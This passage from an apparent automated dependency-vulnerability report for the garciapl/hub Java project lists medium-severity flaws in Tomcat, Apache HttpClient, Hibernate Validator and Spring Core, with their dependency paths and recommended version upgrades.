Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption - An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For example, the npm ws package.

Remediation

Upgrade org.yaml:snakeyaml to version 1.26 or higher.

References

medium severity

Improper Input Validation

  • Vulnerable module: org.apache.httpcomponents:httpclient
  • Introduced through: org.apache.httpcomponents:httpclient@4.5.3

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.apache.httpcomponents:httpclient@4.5.3
    Remediation: Upgrade to org.apache.httpcomponents:httpclient@4.5.13.

Overview

org.apache.httpcomponents:httpclient is an HttpClient component of the Apache HttpComponents project.

Affected versions of this package are vulnerable to Improper Input Validation. Apache HttpClient can misinterpret a malformed authority component in request URIs passed to the library as a java.net.URI object and pick the wrong target host for request execution.

Remediation

Upgrade org.apache.httpcomponents:httpclient to version 4.5.13 or higher.

References

medium severity

Denial of Service (DoS)

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.1.16.RELEASE.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.1.16.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Denial of Service (DoS). An h2c direct connection did not release the HTTP/1.1 processor after the upgrade to HTTP/2. If a sufficient number of such requests are made, an OutOfMemoryException could occur leading to a denial of service.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption - An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For example, the npm ws package.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 10.0.0-M7, 9.0.37, 8.5.57 or higher.

References

medium severity

HTTP Request Smuggling

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.4.8.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.4.8.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to HTTP Request Smuggling. Tomcat does not correctly parse the HTTP transfer-encoding request header in some circumstances, leading to the possibility of request smuggling when used with a reverse proxy.

Specifically, Tomcat incorrectly ignores the transfer-encoding header if the client declared it would only accept an HTTP/1.0 response; it honours the identity encoding; and it does not ensure that, if present, the chunked encoding was the final encoding.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 10.0.7, 9.0.48, 8.5.68 or higher.

References

medium severity

Improper Input Validation

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.17.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.17.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Improper Input Validation due to the improper handling of HTTP trailer headers. An attacker can manipulate the server into treating a single request as multiple requests by sending a specially crafted, invalid trailer header. This could lead to request smuggling when the server is behind a reverse proxy.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 8.5.94, 9.0.81, 10.1.14, 11.0.0-M12 or higher.

References

medium severity

Incomplete Cleanup

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.17.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.17.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Incomplete Cleanup when recycling various internal objects. An error could cause some parts of the recycling process to be skipped, leading to information leaking from the current request/response to the next. An attacker can gain unauthorised access to sensitive information by exploiting this error.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 8.5.94, 9.0.81, 10.1.14, 11.0.0-M12 or higher.

References

medium severity

Information Disclosure

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.2.12.RELEASE.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.2.12.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Information Disclosure. When serving resources from a network location using the NTFS file system, affected versions were susceptible to JSP source code disclosure in some configurations. The root cause was the unexpected behaviour of the JRE API File.getCanonicalPath() which in turn was caused by the inconsistent behaviour of the Windows API (FindFirstFileW) in some circumstances.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 10.0.0-M10, 9.0.40, 8.5.60, 7.0.107 or higher.

References

medium severity

Information Exposure

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.2.12.RELEASE.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.2.12.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Information Exposure. An HTTP request header value could be reused from the previous stream received on an HTTP/2 connection for the request associated with the subsequent stream. While this would most likely lead to an error and the closure of the HTTP/2 connection, it is possible that information could leak between requests.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 8.5.60, 9.0.40, 10.0.0-M10 or higher.

References

medium severity

Information Exposure

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.3.10.RELEASE.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.3.10.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Information Exposure through an incomplete POST request, which triggers an error response that could contain data from a previous request from another user.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 8.5.64, 9.0.44, 10.0.4 or higher.

References

medium severity

Unprotected Transport of Credentials

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.5.15.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.5.15.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Unprotected Transport of Credentials when using the RemoteIpFilter with requests received from a reverse proxy via HTTP, in which the X-Forwarded-Proto header is set to https. Session cookies do not include the secure attribute, so the user agent may transmit the session cookie over an insecure channel.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 8.5.86, 9.0.72, 10.1.6, 11.0.0-M3 or higher.

References

medium severity

Improper Input Validation

  • Vulnerable module: org.hibernate:hibernate-validator
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.hibernate:hibernate-validator@5.3.6.Final
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.0.0.RELEASE.

Overview

org.hibernate:hibernate-validator is a Hibernate Validator Engine Relocation Artifact.

Affected versions of this package are vulnerable to Improper Input Validation. A bug in the message interpolation processor enables invalid EL expressions to be evaluated as if they were valid. This flaw allows attackers to bypass input sanitization (escaping, stripping) controls that developers may have put in place when handling user-controlled data in error messages.

Remediation

Upgrade org.hibernate:hibernate-validator to version 6.0.19.Final, 6.1.3.Final or higher.

References

medium severity

Improper Input Validation

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.3.11.RELEASE.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.3.11.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Improper Input Validation. Queries made by the JNDI Realm did not always correctly escape parameters. Parameter values could be sourced from user provided data (e.g., user names) as well as configuration data provided by an administrator. In limited circumstances it was possible for users to authenticate using variations of their user name and/or to bypass some of the protection provided by the LockOut Realm.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 10.0.6, 9.0.46, 8.5.66, 7.0.109 or higher.

References

medium severity

Improper Input Validation

  • Vulnerable module: org.springframework:spring-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework:spring-core@4.3.13.RELEASE
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.5.8.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-web@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-web@7.0.0-M4 org.springframework:spring-beans@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-beans@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-aop@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-expression@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-context@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-core@4.3.13.RELEASE
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.5.8.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-web@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-aop@7.0.0-M4 org.springframework:spring-beans@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-context@7.0.0-M4 org.springframework:spring-beans@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-web@7.0.0-M4 org.springframework:spring-beans@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-context@7.0.0-M4 org.springframework:spring-aop@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-context@7.0.0-M4 org.springframework:spring-expression@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-context@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-core@4.3.13.RELEASE
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.5.8.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-context@7.0.0-M4 org.springframework:spring-aop@7.0.0-M4 org.springframework:spring-beans@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-context@7.0.0-M4 org.springframework:spring-beans@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-context@7.0.0-M4 org.springframework:spring-aop@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-context@7.0.0-M4 org.springframework:spring-expression@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-context@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-context@7.0.0-M4 org.springframework:spring-aop@7.0.0-M4 org.springframework:spring-beans@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-context@7.0.0-M4 org.springframework:spring-beans@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-context@7.0.0-M4 org.springframework:spring-aop@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-context@7.0.0-M4 org.springframework:spring-expression@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-context@7.0.0-M4 org.springframework:spring-aop@7.0.0-M4 org.springframework:spring-beans@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE

…and 24 more

Overview

org.springframework:spring-core is a core package within the spring-framework that contains multiple classes and utilities.

Affected versions of this package are vulnerable to Improper Input Validation when a user provides malicious input, causing insertion of additional log entries.

Remediation

Upgrade org.springframework:spring-core to version 5.2.19.RELEASE, 5.3.14 or higher.

References

medium severity

Improper Output Neutralization for Logs

  • Vulnerable module: org.springframework:spring-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework:spring-core@4.3.13.RELEASE
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.4.12.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-web@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-web@7.0.0-M4 org.springframework:spring-beans@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-beans@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-aop@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-expression@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-context@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-core@4.3.13.RELEASE
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.4.12.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-web@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-aop@7.0.0-M4 org.springframework:spring-beans@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
